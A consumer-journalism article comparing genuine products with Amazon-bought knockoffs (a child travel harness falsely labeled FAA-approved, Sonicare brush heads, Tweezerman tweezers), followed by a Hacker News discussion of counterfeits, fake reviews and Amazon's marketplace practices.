Although the YXTDZ booster is not trying to pass itself off as a Mifold by name, it's clearly a knockoff of the Mifold's unique design. And it's not the only one: Mifold CEO Jon Sumroy told us that he began to see copycats almost as soon as the company launched. "They don't copy exactly the design, but what they have done is copy the concept of the product." (Sumroy compares his invention against cheap knockoffs in this video.) The physical differences are clear, but it's those invisible differences—including the fact that whereas the Mifold is compliant with federal safety requirements for child-restraint systems, the knockoff does not appear to be—that are far more worrisome.

The listing no longer exists.

4. Child travel harness

  • The product page falsely claimed this knockoff harness had FAA approval. The listing is no longer active.

  • Click the right arrow to see which one is FAA-approved. Photo: Rozette Rago

  • On the left, the Kids Fly Safe CARES harness, the only FAA-approved child harness available; on the right, the knockoff, which has a label that falsely advertises FAA approval. Photo: Rozette Rago

  • The product page falsely claimed this knockoff harness had FAA approval. The listing is no longer active.

  • Click the right arrow to see which one is FAA-approved. Photo: Rozette Rago

The Kids Fly Safe CARES (Child Aviation Restraint System) airplane safety harness is meant to allow you to secure smaller children, between 22 and 44 pounds, on a plane without needing to lug a heavy car seat along. The patented and trademarked harness is made by AmSafe, an aviation-products manufacturer that makes restraint systems for 600 airlines, according to the company's website. The AmSafe harness has been certified (PDF) as having an ELOS (Equivalent Level of Safety) to a car seat, a Federal Aviation Administration representative told us: "It is the only harness-type child safety restraint that the FAA has certified."

As for the differences in comparison with the knockoff:

  • Despite the fact that the authentic Kids Fly Safe CARES harness is the only restraint system of its type certified by the FAA, the Toddler Airplane Travel Safety Harness we purchased via Amazon Prime fraudulently claimed to have FAA approval.
  • The authentic CARES harness felt much more substantial, with thicker belt material, strongly reinforced stitching, and shoulder straps that locked into place with metal-reinforced buckles. The Amazon-purchased harness had thin, plastic buckles—including, inexplicably, latches to release the shoulder straps. The cheaper harness's adjustable shoulder straps did not lock in place.
  • Whereas the CARES device had safety installation and manufacture information printed directly on the belt, the bought-on-Amazon harness arrived with a paper printout only.

Charley Fussner, a business unit manager at AmSafe, told us that the company has suffered "significant losses - hundreds of thousands of dollars in sales" due to knockoff harnesses that look like the Kids Fly Safe harness but lack the FAA stamp of approval. Amazon removed the listing we purchased the mislabeled harness from, but others remain.

5. Philips Sonicare Sensitive toothbrush heads

  • The Amazon product page for the Sonicare toothbrush heads we ordered presented the items as being the same thing we'd get buying from Phillips or a local pharmacy.

  • Click the right arrow to see which one is real. Photo: Rozette Rago

  • On the left, the Sonicare Sensitive toothbrush heads we purchased from Philips; on the right, the discontinued Sonicare Sensitive toothbrush heads we purchased from Amazon. Photo: Rozette Rago

  • A customer review claiming they received a knockoff.

  • The current model (left) costs about the same as the discontinued model (right). Photo: Rozette Rago

  • The Sonicare Sensitive toothbrush heads we purchased from Philips (left) have softer bristles than the discontinued Sonicare Sensitive toothbrush heads we purchased from Amazon (right). Photo: Rozette Rago

  • The Amazon product page for the Sonicare toothbrush heads we ordered presented the items as being the same thing we'd get buying from Phillips or a local pharmacy.

  • Click the right arrow to see which one is real. Photo: Rozette Rago

We've recommended the Sonicare toothbrush for over four years in the Wirecutter guide to electric toothbrushes. The cost to own one can add up over time because the heads can be expensive—around $8 each, which amounts to $32 a year if you replace them at the recommended three-month interval. Still, we recommend using the brand-name heads over cheap generics for better feel and the confidence of using American Dental Association–approved accessories.

It took me some digging to reach the conclusion that a malfunctioning head I bought for my own use in 2019 wasn't actually a fake but was likely discontinued stock with a slightly different design and harder bristles than the newer design had. I found minor but noticeable differences between Sonicare Sensitive toothbrush heads purchased from a third-party seller through Amazon Prime and those purchased through the Philips website:

  • I purchased Sonicare Sensitive toothbrush heads from Philips.com for almost $27 for a pack of three. The outdated Sonicare Sensitive toothbrush heads that I purchased from a third-party seller on Amazon cost $30 for three, so they were more expensive.
  • On the Philips-purchased head, the bristles were softer and the head was a bit wider. One of the heads I received from Amazon did not fit well on the toothbrush handle, falling off with a little shaking.
  • The logo on the neck of the Philips-purchased head was raised and textured, and the metal ring on the bottom of the head appeared to be slightly wider and more matte. The logo on the Amazon-purchased head looked more narrow and was not raised or textured.
  • The packaging on the Philips-purchased toothbrushes matched current fonts and logos used on Sonicare packaging, with a copyright date on the box of 2017. The label on the Amazon-bought brushes had a copyright date of 2012, and the printing was grainier.
The toothbrush head we purchased from Amazon fell off the toothbrush with a little shaking. Video: Rozette Rago

The Amazon seller returned my money after I asked whether the toothbrush heads were authentic. A representative from Philips Sonicare's customer support looked at pictures of my Amazon-bought toothbrush head and said that the head was an older version, and that Sonicare has since made improvements to the brush head. The Amazon-purchased toothbrush heads seem to have been old or discontinued stock.

6. Tweezerman Slant Tweezers

  • Click the right arrow to see the real one. Photo: Rozette Rago

  • On the left, the Tweezerman 1230-BR tweezers we recommend, purchased from Tweezerman; on the right, the 1230-BP, a similar pair of tweezers from a different Tweezerman line. Photo: Rozette Rago

  • The tweezers look very similar, but you can see that the tip on the 1230-BR (left) is a bit sharper and broader than that of the 1230-BP (right). Photo: Rozette Rago

  • A customer review claims these are fake. We noticed the same differences in thickness between the 1230-BR we purchased from Tweezerman and the 1230-BP we got from Amazon. This Amazon product page has 238 one-star reviews, many claiming that they received fakes.

  • Click the right arrow to see the real one. Photo: Rozette Rago

Tweezerman tweezers have been Wirecutter picks for many years for their filed-down sharpness and superior grip. However, for much of that time we've been warning readers to avoid buying counterfeit tweezers from third-party sellers on Amazon and recommending buying from other retailers, such as Bed Bath & Beyond and Sephora.

We compared a recently purchased set of Tweezerman tweezers delivered via Amazon Prime with a pair we bought directly from Tweezerman. Although we concluded that the Amazon pair was not actually fake, as many customer reviews claim, we did find that the seller had swapped in a model that was different from what was listed on the page (the 1230-BP from the Tweezerman Professional line instead of the 1230-BR from the standard line; the 1230-BP is a model that seems inferior to the tweezers we have long recommended in our guide).

Here are the differences we found:

  • While the angles and length of the tweezers were identical, the Tweezerman-purchased tweezers had thinner tips with more surface area than on the tweezers we purchased from Amazon. That made the Tweezerman-purchased pair feel sharper against the skin, with a better grip on the smallest hairs.
  • The packaging was completely different, with the Amazon-bought tweezers labeled "Tweezerman Professional," despite both packages having copyright dates of 2017 with identical Allure 2018 Best of Beauty stickers. The Amazon-purchased tweezers were labeled 1230-BP, even though the listing was for the 1230-BR.
  • The Tweezerman-purchased tweezers sold for $23, whereas the Amazon-purchased tweezers were $13—nearly half the price.

We were not able to reach anyone at Tweezerman for confirmation of authenticity. A call to Tweezerman's customer service confirmed that there is a Tweezerman Professional line sold at retailers such as Sally Beauty Supply.

Have something you want us to look at and investigate for authenticity? Send a photo and details to [email protected], and we'll compare what you have with what we tested.

Further readingCounterfeit goods have proliferated along with e-commerce. Here's your primer on the growing world of fake products—and the forces working to combat them.It's easier than ever before to mistakenly buy a counterfeit or knockoff product online. Here's what to do when it happens to you.Counterfeit goods sold online today are trickier to distinguish from the real thing than flea market knockoffs. Here, the new rules to spotting fake products.



All Comments: [-] | anchor

president(3430) 1 day ago [-]

Does anyone know if/why it is legal for China to be producing and selling these blatantly knock-off products? It seems outrageous that they are able to sell a product with the same EXACT name (the 'Ove' Glove example in the link) as the copied product.

gowld(10000) 1 day ago [-]

What are you going to do, file a complaint with the WTO?

nkrisc(4311) about 23 hours ago [-]

No it's not legal, but who's going to do anything about it? Good luck suing a Chinese company in China. You might have better luck sending them a letter asking them nicely to stop counterfeiting your product.

ng12(10000) 2 days ago [-]

This happened to me the first time this Christmas. Bought a $25 electric doodad that was 'sold by Amazon' for a family member and it was obviously a fake. It came in a very generic white box with the company logo stamped on it, inside was a product that looked completely different and was non-functional. Not only that, but the product was difficult to return (I had to contact support) which makes me suspect Amazon knew it was a fishy product.

It has completely shaken my faith in Amazon. This is probably my last year as a Prime subscriber.

hnick(10000) 1 day ago [-]

If it's sold by Amazon, they should be 100% liable for selling counterfeit goods, just like anyone else.

californical(10000) 1 day ago [-]

I bought a monitor once on amazon a couple of years ago. It seemed legit -- packaging looked authentic. Monitor looked authentic. But the power cable was really weird and clunky. It had no branding on it, and everything was written in Chinese. It barely fit into the monitor, and the monitor would only turn on if the cable was in exactly the right position. This was an LG monitor, and not a cheap one, so I contacted amazon and they accepted the return and sent a replacement. Well, the replacement was even worse. Same thing where the power cable seemed incredibly cheap, but the monitor itself seemed fine, but I couldn't even get it to turn on unless I was actively holding the power cable into the monitor.

Ended up just returning it again, but thought it was a fluke. I still used amazon for a while, but this type of thing has become so common that I don't use them anymore at all.

wombat-man(10000) 2 days ago [-]

They'll actually pro-rate refund for your remaining time with prime if you cancel. At least they did for me.

clairity(2970) 2 days ago [-]

at the risk of upping the amazon paranoia (which i think is valid but blown out of proportion), i also had a little fake product issue recently with amazon.

i had bought two glass (kitchen) storage jars a year ago and decided in november to order one more. the new one was about 10% smaller with slightly different markings, just similar enough that it wasn't noticeable on first glance, but was obvious when placed next to the other two jars.

initially, i assumed it was a warehouse mix-up, so i requested a replacement. the replacement was exactly the same smaller jar and not the original. mind you, the original was already a chinese-made & branded item. the replacement was a cheaper knockoff of what was probably already a ridiculously marked-up import. luckily it was only a minor hassle to return both and get a refund.

i'm not a big amazon shopper and avoid their own electronics like kindles and echos (don't need more plutocratic surveillance in my life), but for anything of (at least moderate) value, i'll sometimes double-check against photos on amazon and manufacturer's sites. fakes have generally not been a significant problem for me.

poulsbohemian(10000) 2 days ago [-]

You could tell by looking at the two gloves in the story that they were different, but the 'fake' actually looked better to my eyes - the blue rubber appeared thicker and more pronounced. Which brings up a really interesting question about fakes - if they are as good or better than the products they are mocking, are they actually 'fakes'? I fully recognize that there is a need to protect copyright / product dress / brand and that there is a distinct consumer interest in ensuring that products are safe / made from safe materials, BUT - so many of the products that are cloned on Amazon are only distinguishable by price anyway, and have no unique value proposition from one 'brand' to the next.

toast0(10000) 1 day ago [-]

I think there's certainly a terminology issue here.

A product that looks like a name brand product, but doesn't claim to be that product is one thing.

A product that claims to be the name brand product, but isn't is a different.

The name brand probably doesn't want either to be easily avaialable, and will call them both fake. A purchaser might want to take a chance on the former, but shouldn't have to have a chance of getting the latter.

heavyset_go(4298) 2 days ago [-]

> if they are as good or better than the products they are mocking, are they actually 'fakes'

Quality of an individual product aside, the issue surrounding counterfeits is that confidence in the market as whole will wane, which isn't good for anybody.

Symbiote(4295) 2 days ago [-]

'The fake glove's painted-on lines gave off a melted-plastic smell when we used it to hold a heated cast-iron pan for 10 seconds.'

graylights(10000) 1 day ago [-]

Even if it's just as good, you lose all warranty protections. Also if a counterfeit safety product fails and injures someone, good luck.

ThePhysicist(3784) 2 days ago [-]

It's funny: I always thought the Internet and platforms like Amazon with the collaborative reviewing system would make brands more and more obsolete, because you could just pick high-quality products from smaller manufacturers by looking at user reviews.

Now I find that I rely more and more on brands to decide which things I buy, because I simply cannot trust user reviews in most of the cases. Recently there are more and more Chinese products flooding Amazon (Germany) with products that have hundreds of well-written positive reviews. I have to assume that most of them are fake because there's no way that some niche product can have more reviews than let's say a PS4 or Nintendo Switch, which is sold millions of times.

Really a shame that Amazon does not seem to care much about this, maybe a chance for the smaller shops to take back some lost business though. I find that I buy more in smaller e-commerce shops, because I find they're much less affected by the review fraud and often ship things just as fast as Amazon.

zweep(10000) 1 day ago [-]

This was one of the early theories about how Facebook would monetize -- that your real-life friends would value their relationship with you too highly to recommend anything but truly great products to you. That hit the reality that people would squander most of their friends for their stupid MLM scheme.

jay_kyburz(4293) 1 day ago [-]

I think Amazon should employ a hundreds of everyday people to review products full time.

When you list a product on Amazon, you have to pay 10-20 of those Amazon Employees to review the product at arms length.

Say each reviewer is given 2 hours for each product, before you can list a product on Amazon you have to pay $2 x 20 x hourly rate.

These should be the only reviews.

Or you can sell your product with no reviews.

mbesto(3255) 1 day ago [-]

> Really a shame that Amazon does not seem to care much about this, maybe a chance for the smaller shops to take back some lost business though. I find that I buy more in smaller e-commerce shops, because I find they're much less affected by the review fraud and often ship things just as fast as Amazon.

And this will effectively be Amazon's undoing. Given how much central power and authority they control over global retail, this is a good thing. Competition is good for the consumer.

sokoloff(4037) 1 day ago [-]

I've bought a few things that offered an Amazon gift card after a 5-star review. In some cases, the product was genuinely good and while I'd not have bothered to write a review, the gift card is enough to get me to write the review. I'm not going to write a good review for a crap product, but I bet plenty of people do.

harimau777(10000) 1 day ago [-]

I wish Amazon would just let you select which countries you wanted to include/exclude (both for made in and sold by). It wouldn't be perfect, but it would at least allow me to filter out fly by night Chinese manufacturers.

pdonis(4075) 1 day ago [-]

> Now I find that I rely more and more on brands to decide which things I buy

It's interesting that you say this, since Amazon itself is a brand--but not the kind of brand you're looking for. You are looking for reliable quality, and Amazon's brand is quick and cheap.

EE84M3i(4024) 1 day ago [-]

> platforms like Amazon

You can't use the word 'platform' at Amazon, nor the word 'marketplace', it's in violation of the mandatory legal training for FTEs.

andrewfromx(2988) 1 day ago [-]

i think from the director of engineering at amazon charged with making sure reviews are not fake, they would say 'we can only make it so difficult to create a new account and prove you are human before it literally becomes impossible for new people to make real accounts.' You say amazon has to police this more. I say amazon has tried and there is so much money to be made in jumping through the hoops to prove you are a human, that there is no way to win this war.

LetThereBeNick(10000) 1 day ago [-]

I've been happy with the "ReviewMeta" chrome extension, which evaluates the product reviews on any amazon site, and displays a score indicating how likely it is the ratings have been manipulated. It shows examples of flagged reviews which can be pretty funny. Chrome lets you limit extension permissions by domain, so I don't worry about it snooping on the rest of my browsing.

But you're right about brands. When it comes to certain products like phone chargers, the manipulation is so rampant I stick with the same supplier.

Nasrudith(10000) 1 day ago [-]

Personally I would phrase it more cynically - the brand is fundamentally a lie even in a magical no counterfeiting world. It had a purpose once as an 'index' once but it hasn't been that way for a while.

Essentially all a Brand says is that they got money for it. It how it was made or that they won't decide to cut corners for their next quarterly earnings no matter how many years it was good.

In practice given how often the 'counterfeits' are made in the same factory by the same workers with materials from the same supplier the money going there is no guarantee of either product quality or righteousness.

Trying to use brand for delegating quality control is doomed to failure in the real world.

I suspect the better approach towards product identification would be going by verifiable specifications like manufacturers and doing both shopping and any enforcement based upon that. It would be hard as hell to transition society towards that as a norm though with marketer saturation, time investment, and every manufacturer having a financial incentive to try to decommoditize themselves to improve yields and protect themselves from competition.

mc3(4144) 1 day ago [-]

Maybe this is what will save bricks and mortar? Guess where I buy any product I am going to ingest, put on my skin or plug into a wall?

A real store with some special online exceptions, but those exceptions are never going to be Amazon or Ebay.

There are some shady real stores selling shit too of course, so I have to be choosy, but I'm feeling pretty safe at a national supermarket chain, or Kmart.

habanany(10000) 1 day ago [-]

It's probable PS4 and Nitendo users are too busy playing so they have no time to write a review I'm just saying.

andrepd(3720) 1 day ago [-]

But what do brands matter if the issue is counterfeits/knockoffs?

professorTuring(4234) 1 day ago [-]

That is exactly what I feel.

More and more I find Amazon to be closer and closer to a Chinese Bazar of cheap quality items (kind of an AliExpress or dx but with a different perceived quality).

I believe they will gain a lot of customers among people who just want cheap stuff (or don't care if it is original as long as the brand is clearly visible and is cheaper) but definitely they will lose customers that use Amazon for convenience (more or less the same price, better refund policies, availability of products...)

It's a pity. Hopefully others will fill that space.

In Spain, El Corte Inglés with its new on-line platform is getting closer and closer.

InternetOfStuff(10000) 1 day ago [-]

> Now I find that I rely more and more on brands to decide which things I buy, because I simply cannot trust user reviews in most of the cases.

The other day I came across something interesting: two comments, for two different but related products (dynamos). One comment was in German, the other in Italian, but they both had the same non-sequitur in them.

Apparently scammers reuse comments across products (not surprising) and languages (more surprising).

EmpirePhoenix(10000) 1 day ago [-]

Also funny, my result of this is that I now order basically everything directly via aliexpress. If all i get is chinese crap anyway, I can at least get it cheaper.

Then I noticed that aliexpress actually made some pretty good page design choices. Since you can see how long a seller is registered and how many they have sold (both directly on the product information site), it is pretty easy to find a at lest decent trader there

pjc50(1454) 1 day ago [-]

One of the important lessons of the internet is that unless there's very deliberate suppression, noise will drown out signal if there's the slightest incentive to spam.

Anything that can be faked will be faked in bulk.

sn4pp(10000) 1 day ago [-]

Just got scammed on one of those smaller sites, f it, I'll buy on amazon so I atleast get anything shipped to me.

Dylan16807(10000) 1 day ago [-]

This issue isn't reviews vs. brands. The biggest problem with Amazon is that the reviews and brands are disconnected from the actual supplier. Who knows what you'll get?

perjes(10000) about 12 hours ago [-]

I'd recommend using https://reviewmeta.com. It filters out suspicious reviewers and makes it much easier to avoid products with bought reviews on Amazon. Wouldn't make purchases there without it.

hrktb(4316) 1 day ago [-]

I think we are going in the expected direction, but we're not at the end yet.

About brands, we've seen the rise of comparison sites and review videos that allows unknown products to raise to the top. I'd say that's pretty in line with your expectations towards user reviews. We just have more experienced, less influencable/buyable reviewers (in general). For instance the top vacuum cleaner on wirecutter doesn't need to be a Dyson to get recognized.

The main issue here is really Amazon messing with the supply chain and injecting fakes where they could be guaranteeing genuine products instead. In a sense, looking at a wirecutter like site and buying directly from the maker is the best of both worlds.

reaperducer(4097) 2 days ago [-]

Now I find that I rely more and more on brands to decide which things I buy

I do the same. I wish I didn't, but I don't know what the practical alternative is. I guess it's the whole reason that brands were created in the first place.

I do source some of my stuff from smaller brands and shops, whenever I can. But that's not always an option.

When it comes to software, I'm not entirely satisfied with Apple's 'walled garden.' But for hardware, I know that if I get something at the Apple Store, or from apple.com, I generally don't have to worry.

It's because of this that I wish Apple† would go back into some of the product lines it has abandoned. Wifi routers. Servers. Printers and scanners. Even AA batteries and blank DVD's (I still have some of both). I'm at the point where I'll pay extra for confidence in the product.

† Or some other tech company that cares about its brand.

baybal2(2038) 1 day ago [-]

> Really a shame that Amazon does not seem to care much about this

No, no, no! They do care, and a lot!

Amazon has been busy catching up to, and undercutting Alibaba on China-US direction for the last 5 years.

Amazon has managers whose full time job is to poach vendors from Alibaba.

I'm getting spammed by their salespeople non-stop

leoh(3920) 1 day ago [-]

> It's funny: I always thought the Internet and platforms like Amazon with the collaborative reviewing system would make brands more and more obsolete, because you could just pick high-quality products from smaller manufacturers by looking at user reviews.

Totally agree. I think a lot of people feel this way, which is why it's so lucrative for Amazon and sellers to cheat on reviews.

sfifs(4313) 1 day ago [-]

> because you could just pick high-quality products from smaller manufacturers by looking at user reviews

Well one of the things big brands - especially in the consumer products industry like the one I work in - do quite religiously is product testing during research and a lot of q/a during manufacturing to eliminate as far as possible risk of safety issues.

We sometimes take competitive products through the same tests and while what some of the small producers sometimes produce wouldn't be illegal, we'd never run with those standards. Bigger competitors tend to be largely fine.

int_19h(10000) 1 day ago [-]

Chinese manufacturers themselves seem to follow this model. When they sell cheap junk, you see those one-shot noname brands. But once some market niche is flooded at the bottom, and the only way to get more of that market is to expand into higher-quality offerings, you start seeing established brands that care about their reputation, to the point where they sometimes outdo Western brands. One example that I know through my hobby is Holosun - not only they compete directly, and quite successfully, against Western market leaders on features and quality, but, in US at least, they have live support based in the country - not the usual call center somewhere in India.

myopenid(10000) 1 day ago [-]

You're right user reviews on Amazon are manipulated. Bought a bluetooth earphone on Amazon DE, was contacted by vendor to exchange a five star for a half refund.

Also came across Facebook ads that asks you to buy random crap and leave positive review in exchange for a full refund, and they call this 'free samplimg'.

inoop(4319) about 23 hours ago [-]

> Really a shame that Amazon does not seem to care much about this

Amazon cares, but Chinese sellers are paying Amazon customers to write fake reviews for them. There's an article about it here:

https://www.buzzfeednews.com/article/nicolenguyen/her-amazon...

This practice basically makes it impossible to tell fake reviews from real ones.

Aweorih(10000) about 17 hours ago [-]

I saw a documentation a while ago on yt where a German family bought a smartphone over Amazon, which was from China (not sure anymore if they knew at that moment). It exploded then some time later while charging.. they said that Amazon also did not much care and it took a while until it was removed.

I can also say that the company where I work at, had already multiple times problems with Amazon. True they are maybe a bit of a different kind but I think that dollars is the most important thing for them. Even if you have to fk with customers or third party sellers in one or the other way. That's also why I only buy at Amazon if it's really necessary and it's from a big company, like Nintendo or so.

There's also now the law in Germany (or soon) which prohibits the destroying of brand new stuff just because it did not sell. That happened mainly (I'd say) because of Amazon where it went public that 2 trucks left a single warehouse on average per day, filled with only that kind of products

agumonkey(877) 1 day ago [-]

The web feels like a huge fine grained stress test to reassess all the reasons why most of the world was the way it was.

BiteCode_dev(10000) 1 day ago [-]

Unfortunate, brand loyalty doesn't mean anything anymore:

- a lot of companies don't manufacture the product themself

- they don't even manufacture two products from the same subcontractor

- sometime, the same product, between two batches, is not produce by the same sub-contractor

- big players just don't care. Cisco is not going to lose business because you chose to not buy, and most people won't follow you to allow the boycott to have enough wait

- PR firms are so powerful now they can make any brand great again. See Microsoft. I guaranty there will be people that will want to answer this comment stating how they really are a good firm now. And cite great things they do. Yet I bet in 10 years, we will learn about some other horrible things they did. Again. It's been like that for decades. PR works extremely well now, people genuinely live the feeling they've been lead to by those amazing consent manufacturer.

- a brand is dead ? Don't worry, it will be renamed into another one. Or subcontract for another one. You will buy its product again, you will just don't know you do.

Gene_Parmesan(10000) 1 day ago [-]

> I find that I buy more in smaller e-commerce shops, because I find they're much less affected by the review fraud

I've had to start doing this with violin strings. The sort of strings I like are pretty damn expensive (~$120 list price), so originally, any chance I could get to save say 10% I would take. But I heard way too much about fakes being shipped from Amazon 3rd party sellers, so I've started just buying everything from Shar (which, it turns out, provides steep discounts fairly regularly; you just have to wait for them).

onetimemanytime(461) 1 day ago [-]

>>Now I find that I rely more and more on brands to decide which things I buy,

Amazon used to be that brand for me, I trusted that I'd get a real product vetted by real reviewers and by Amazon. Adios

erentz(1711) 2 days ago [-]

I see the Amazon fake products problem as related to the social network fake news problem. In both cases you have a company that wants to both have it's platform cake and eat it's publisher cake at the same time. (Sorry for the bad spin on that phrase there.)

One important part of our solution here has to be that we force these companies to take a position one way or the other. So in Amazon's case it would need to decide - am I a platform for companies to set up there own online shop and provide fulfillment services to? Or am I myself the online shop?

In the later case they become responsible for product, like any business. In the former, they aren't. But in the former they now need to act as just a platform and not provide all the branding that makes it look like you're buying from Amazon. So they'd be more akin to Shopify or something I suppose. Every fly by night shop that wants to set up needs to set up its own branding and that way brand reliability and recognition still works and items are no longer commingled.

pmart123(4300) 2 days ago [-]

I agree from in some capacity in the growth or greed to increase DAU and engagement for social networks is similar to Amazon's desire to grow SKUs and purchase volume. Amazon mixing SKUs maybe relates to when press piggy backs off of the same initial headline as it creates distrust and makes people question the quality of the product.

There's a big difference though. Social media allows many individual voices, and much like the printing press, allows previously unheard voices to be heard and to have reach. Therefore, the world's expert can call out a journalist for being wrong immediately, making it seem like "fake news" is more common than it was previously.

Amazon is actually causing distrust around product quality when there wasn't any before. Consumers may have trusted Colgate's toothpaste, but if it isn't actually Colgate's toothpaste, yet it poisons someone, it becomes Colgate's problem too. This would be like Facebook or Twitter allowing any account to adopt a WSJ or NyTimes verified badge, one of those accounts publishes fake news, and then the paper itself has a problem too.

JKCalhoun(4302) 2 days ago [-]

Yeah, been going to AliExpress more and more. If Amazon is going to a platform for other companies, I'll go with the cheapest one....

ajmurmann(10000) 1 day ago [-]

Just stopping the insane co-mingling of products from different sellers would go such a long way. The co-mingling is in essence destroying accountability and evidence!

empath75(1911) 2 days ago [-]

I think you solve it by making amazon directly liable for fraud on their platform. They'd clean up the problem pretty quickly after losing a few billion dollars in lawsuits.

tracer4201(10000) 2 days ago [-]

Disclaimer: I don't own amazon directly but do own funds where Amazon is a significant chunk.

I don't agree with this kind of regulation. It's simply not the governments role to decide. You as a seller are not forced to sell on Amazon. I say that as the spouse of a seller who owns a store on EBay that's continued to be successful. We had a bad experience selling on Amazon and are better off without them. Of course that's just our experience but I'm not convinced Amazon is a monopoly here.

I do think Amazon needs to be held liable for fake products and whatever damage they cause its customers. Amazon simply selling goods with no liability of fraudulent items is a disgrace, and I don't think they will change until we ram some regulation down their throat.

the_snooze(10000) 2 days ago [-]

>I see the Amazon fake products problem as related to the social network fake news problem. In both cases you have a company that wants to both have it's platform cake and eat it's publisher cake at the same time. (Sorry for the bad spin on that phrase there.)

These companies innovate by showing off a layer of whiz-bang techy goodness so people don't notice that they've simply externalized all the responsibility and internalized all the profits.

TeMPOraL(2736) 2 days ago [-]

> I see the Amazon fake products problem as related to the social network fake news problem.

Brought it up elsewhere[0], but I think you're right in more than one way. Beyond publisher vs. platform issue, fake news are the digital equivalent to counterfeiting; they're to news - and in general, to information media[1] - what Amazon counterfeits are to physical products.

--

[0] - https://news.ycombinator.com/item?id=22399726

[1] - Which include all digital media and most physical books.

mschuster91(3373) 2 days ago [-]

For the products that are actually regulated like the child support seats: hold Amazon liable for selling product that is illegal.

Make it expensive for Amazon to not police the shit that third parties are throwing on the marketplace - and soon you won't see any fakes any more.

You want to know where Bezos got his billions? Partially because Amazon outright shits on all the regulation that traditional brick and mortar places have - like, not selling product that is illegal, counterfeit or offensive.

gowld(10000) 1 day ago [-]

> offensive

Ugh.

KaoruAoiShiho(4125) 2 days ago [-]

Is it not possible to look at the seller to tell if it's the real company selling the product? I wouldn't buy branded from some no-name seller, that's no better than ebay.

matsemann(10000) 2 days ago [-]

If multiple sellers sell the 'same' item and use amazon as warehouse, they can be binned together and you get one at random from any one of the sellers no matter which one you actually bought from.

ck2(316) 2 days ago [-]

Note that Amazon themselves (as the seller) will sometimes grey-market source items if they don't/can't cut a good deal with the manufacturer.

They admit this. Which means buying from them directly is no guarantee.

Scoundreller(4284) 1 day ago [-]

I can't blame them. Some manufacturers are very stuck on manufacturer-approved retailers to keep prices high, but ostensibly for any other reason.

Should be unlawful imo.

someonehere(10000) 2 days ago [-]

I have friends who are no longer buying from Amazon. Especially friends with kids. You can't trust anything safe for your kids when crap like this is allowed. Amazon is in a race to flood the market with availability at the cost of consumer confidence.

Remember all the hoverboard fires you saw on the news several years ago? They weren't knock offs, but items sold that didn't have any real safety certifications in mind. Amazon only cares something bad happens on the news and they're involved.

chx(812) 1 day ago [-]

> items sold that didn't have any real safety certifications in mind.

The amount of electronics sold without an UL/ETL cert on Amazon is staggering. Many companies no longer bother getting one because there's noone to stop them from selling uncertified crap. Also, we have seen unscrupulous dealers slapping a fake ETL cert on their product and even when Intertek contacted Amazon they didn't take it down!

Hell, there's an 'international' power strip sold under many different names which provides three NEMA 5-15R from a single IEC C5/C6 coupler (the IEC standard is up to 2.5A but the UL certifies it up to 13A but still, the NEMA connector is 15A) and to top it off, it is sold with an ungrounded cable. I often see it recommended on travel forums, for real. I can't even decide whether shock or fire is the bigger hazard with this. Someone eventually will burn down an airbnb with it and then will the finger pointing start.

nappy-doo(4310) 2 days ago [-]

My neighbor bought a set of woodworking clamps from Amazon. When the ~25lb. box arrived, the driver threw them up onto his porch (his house is quite raised from the street), and he has video of it damaging his siding as it took three attempts for the driver to get them over the railing onto his porch. When he contacted Amazon, they said to contact some insurance company they had. When my neighbor called the insurance company, they never returned the call.

He proceeded to begin researching the insurance company, which was owned by Amazon, but wasn't listed as a valid insurance company in Massachusetts. He contacted Amazon again, and said, 'would you like me to call the insurance commissioner and attorney general that you're operating a non-registered insurance company in Massachusetts.' Someone was out to fix his siding in 3 days, and they painted the porch as well (due to some paint matching problem).

Despite how much I love being able to order stuff, and not have to go out, Amazon is pretty scum-tacular.

dimnsionofsound(10000) 1 day ago [-]

Mildly related, here's another instance of harmful things you can buy on Amazon: "negative ion" trinkets that are actually radioactive [1].

[1]: https://youtu.be/C7TwBUxxIC0

thaumaturgy(2269) 2 days ago [-]

I went from being an enthusiastic fan of Amazon Prime and a $50k spend one year [+] to closing my Amazon account and then warning other people away from it in the space of about five years.

I can't recall any other business from which I've moved so quickly and so far from one end of the spectrum of enthusiasm to the other.

[+] Most of it was for business -- parts and equipment for customers, it was often cheaper that way than my wholesale supplier.

wombat-man(10000) 2 days ago [-]

Cancelled my prime this year, haven't looked back. A lot of retailers offer free shipping if you order a certain dollar amount and while they have a smaller selection, I can be pretty sure I'm not receiving anything fake. They also tend to have a lot less noise in search results.

main downside is I'm having to order from multiple places, but it hasn't been too bad.

koboll(4320) about 24 hours ago [-]

I'm astonished no competitor like Walmart or Wayfair has gone on the offensive yet with TV ads stating flat-out that you can't trust Amazon anymore because their counterfeit problem is out of control. They'd make a killing with defectors.

miked85(4098) 2 days ago [-]

I have started buying most products directly from manufacturer's websites or in physical stores now. The amount of fake products on Amazon is appalling, I wonder why they don't put effort into stopping this.

arbitrage(10000) 1 day ago [-]

I tried this recently. Bought something from the manufacturer, paid extra for shipping & handling, waited longer, the whole bit. I felt good about myself, because I don't want to be taken advantage of anymore, and hey ... I'm buying directly from the manufacturer, so they get a higher cut. Right?

No. I bought directly from the manufacturer's website, paid them, got email from them, the whole bit ... and it was fulfilled and delivered by Amazon. I got an amazon box, and an amazon invoice, and an amazon product.

You can't win anymore. Online commerce is subverted. What you see, no matter how savvy of a consumer or how much experience you have with online shopping, is not guaranteed to be what you get, anymore.

IshKebab(10000) 1 day ago [-]

Is this an American problem? As far as I know I've never received a fake product from Amazon in the UK.

jccooper(4207) 2 days ago [-]

The actual solution would require them giving up being a 'platform' or would require changes that would make logistics and/or management of the platform take much more effort. They'd rather let a 'fraud department' keep chopping off hydra heads at a much lower cost.

VLM(10000) 2 days ago [-]

Very few products on Amazon are sold by the creator. Virtually everything is sold by a mixture of middlemen and importers and drop shippers.

Its virtually impossible to tell the difference between a product I'm middle-manning that's interpreted by investigators as real, vs a product that's interpreted as fake.

With books, nobody really minds if conceptually a book sat unopened on a bookstore shelf with the general public touching and pawing it occasionally vs a book that sat pristine untouched and cleaner on my home bookshelf, although one is marketed as 'new' and one as 'used', but in practice it usually doesn't matter. Also see the weirdness with $10 'indian subcontinent only' textbooks that normally sell for $200 to sucker american students, nobody complains their book was 'fake' with a 95% discount to keep them quiet.

On the other hand, do that same game with toothbrushes and in roll the complaints.

This may be a problem inherent to online shopping in the long term. A copy of 'Numerical Recipes in C edition 3' is a fungible commodity. Apparently, as per the linked article, that is not the case with fad overpriced gloves and toothbrushes. Possibly that type of product is inherently unsuitable for online purchase.

marcinzm(10000) 2 days ago [-]

>I wonder why they don't put effort into stopping this.

